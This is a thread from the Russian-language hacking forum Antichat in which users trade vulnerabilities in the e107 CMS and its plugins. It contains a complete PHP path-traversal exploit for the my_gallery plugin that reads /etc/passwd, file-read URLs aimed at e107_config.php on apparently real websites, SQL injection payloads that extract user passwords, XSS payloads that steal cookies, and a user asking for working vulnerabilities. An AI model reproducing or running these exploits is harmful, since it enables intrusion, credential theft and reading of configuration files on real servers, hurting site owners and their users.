ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости > Сценарии/CMF/СMS
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #41  
Старый 05.07.2009, 01:29
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

Очень интересное наблюдение!

В движке е107 имеется возможность показывать аватары с других ресурсов, однако никакой проверки контента не существует, и вставив например ссылку со сплойтом вместо аватары, она сработает как Iframe, и хрен её заметишь =)) (ибо img src= и iframe= работают по одному принципу подгрузки контента)


Решение: Отключить нафиг эту функцию показа аватары с удалённого ресурса =)).

Последний раз редактировалось Nightmarе; 19.07.2009 в 01:29..
 

e107 Plugin my_gallery 2.4.1 Exploit
  #42  
Старый 24.07.2009, 02:09
Solide Snake
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499

Репутация: 3702


Отправить сообщение для Solide Snake с помощью ICQ
По умолчанию e107 Plugin my_gallery 2.4.1 Exploit

e107 Plugin my_gallery 2.4.1 Exploit


Class: Input Validation Error
Remote: Yes
Vulnerable: e107.org my_gallery 2.4.1
e107.org my_gallery 2.3
e107.org my_gallery 0

Код:
<?php

/*

============================================
[o] e107 Plugin my_gallery 2.4.1 Exploit [o]
============================================

Bug [f]ound by NoGe - noge.code@gmail.com
Exploit [c]oded by Vrs-hCk - d00r@telkom.net

* Plugin my_gallery create photo gallery.
* Powered by Highslide JS script.
* With random gallery menu and navigation menu.
* Has a comment system, ratings and search of images.

Download e107 my_gallery 2.4.1 Plugin
http://code.google.com/p/e107mygalleryplugin/downloads/list


=============
[o] Usage [o]
=============

Web 2 XPL << fill with site who use e107 Plugin my_gallery
File 2 Read << fill with file or directory you want to read

Web 2 XPL : www.contoh.com
File 2 Read : /etc/passwd

Then Go!!!


==============
[o] Greetz [o]
==============

MainHack BrotherHood [ http://news.serverisdown.org ]
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
H312Y yooogy mousekill }^-^{ loqsa zxvf martfella
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke

FUCK TERORIS!!

*/

$vuln  = '/e107_plugins/my_gallery/image.php?file=';
$trasv = '/../../../../../../../../../../../../../../..';

echo "<form method=POST>
Web 2 XPL : <input type=\"text\" name=\"host\" size=30>
File 2 Read : <input type=\"text\" name=\"file\" size=30>
<input type=submit value=\"Go!!!\" name=\"_xpl\">
<br><br>";

if ($_POST['_xpl']) {
	$data .= "GET /{$vuln}{$trasv}{$file} HTTP/1.1\r\n";
	$data .= "Host: {$host}\r\n";
	$data .= "Connection: close\r\n\r\n";
	$html  = sendpacket($host,$data);
	print '<pre>'.htmlspecialchars($html).'</pre>';
}

echo "</form>";

function sendpacket($host,$data) {
	if (!$sock = @fsockopen($host,80)) {
		die("[!] Connection refused, try again!\n");
	}
	fputs($sock,$data);
	while (!feof($sock)) { $html .= fgets($sock); }
	fclose($sock);
	return $html;
}

?>

# milw0rm.com [2009-07-23]
 

  #43  
Старый 26.08.2009, 15:17
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

Цитата:
Сообщение от Solide Snake  
e107 Plugin my_gallery 2.4.1 Exploit


Class: Input Validation Error
Remote: Yes
Vulnerable: e107.org my_gallery 2.4.1
e107.org my_gallery 2.3
e107.org my_gallery 0
1.image.php?file='; это в файле image постом выше


2.Читалка файлов

Файл dload.php

PHP код:
<?php
$file 
$_GET['file'];
$date_txt date("y-m-d_H-i-s");
$text "Content-Disposition: attachment; filename=".$_SERVER["SERVER_NAME"]."_e107_my_gallery_".$date_txt.".jpg";
header('Content-type: image/jpeg');
header($text);
readfile($file);
?>
все тоже самое тока в еще одном файле

Пример : __http://www.verrechiaswords.com/e107_plugins/my_gallery/dload.php?file=/etc/passwd


там он вам даст сохранить картинку, сохраняем, открываем в блокноте и видим след строчки

Код:
<br />
<b>Warning</b>:  readfile(\') [<a href='function.readfile'>function.readfile</a>]: failed to open stream: No such file or directory in <b>/home/verrechi/public_html/e107_plugins/my_gallery/dload.php</b> on line <b>7</b><br />
*conf DB

http://www.verrechiaswords.com/e107_plugins/my_gallery/dload.php?file=../../e107_config.php

Последний раз редактировалось HAXTA4OK; 26.08.2009 в 16:57..
 

  #44  
Старый 29.08.2009, 14:56
[underwater]
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме:
2185909

Репутация: 308
По умолчанию

На самом деле експлоит написан был раньше http://milw0rm.com/exploits/5308
Цитата:
http://www.obqvizapavlikeni.com/e107_plugins/my_gallery/dload.php?file=../../e107_config.php
 

  #45  
Старый 19.09.2009, 19:54
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

XSS в модуле YouTube Gallery(ytm_gallery):
Код:
e107_plugins/ytm_gallery/ytm.php?paging=<script>alert()</script>
© Nightmare
 

  #46  
Старый 08.11.2009, 18:36
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию

e107(e107_v0.7.16_standart_RUS)


active XSS in comment's news
Код:
......./path/comment.php?comment.news.[id]
Submit comment
Subject: <script>alert(//)</script>
Comment:<script>alert(//)</script>

куки имеют вид:
1.1a1dc91c907325c69271ddf0c944bc72
id.md5(pass)


при инстале префикс таблиц не фильтруется
Код:
mysql_query("INSERT INTO {$this->previous_steps['mysql']['prefix']}core VALUES ('SitePrefs_Backup', '{$tmp}')");
 

  #47  
Старый 08.11.2009, 18:46
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

активки не во всех сборках, в норм версиях фильтрация стоит.
 

  #48  
Старый 08.11.2009, 19:12
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832

Репутация: 1588
Отправить сообщение для [x60]unu с помощью ICQ
По умолчанию

SQL injection in e107 cms
Version = v0.7 or later
SQL
http://localhost/plugins/userjournals_menu/userjournals.php?blog.[SQL]

1:
Код:
-1 union all select 1,2,null,4,5,6,@@version,8,9,0,11,12,13--
2:
Код:
-1 union all select 1,2,3,4,5,6,user_password,8,9,0,11,12,13 from e107_user--
bug site:
http://www.shanomaac.com/e107_plugins/userjournals_menu/userjournals.php?blog.-1%20union%20all%20select%201,2,null,4,5,6,@@versio n,8,9,0,11,12,13--
 

  #49  
Старый 09.12.2009, 13:53
Solide Snake
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499

Репутация: 3702


Отправить сообщение для Solide Snake с помощью ICQ
По умолчанию

Межсайтовый скриптинг e107 ветки 0.x

Код:
Referer: "><script>alert(document.cookie)</script>
(c)
 

  #50  
Старый 26.04.2010, 02:33
sir95
Новичок
Регистрация: 30.11.2009
Сообщений: 9
Провел на форуме:
70191

Репутация: 0
Cool

Цитата:
Сообщение от Nightmarе  

Решение: Отключить нафиг эту функцию показа аватары с удалённого ресурса =)).
Оно не загружает, оно просто показывает изображение , пробывал но ничего не получилось.

Поскажите какие есть уязвимости на 0.7.11 , очень надо.
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ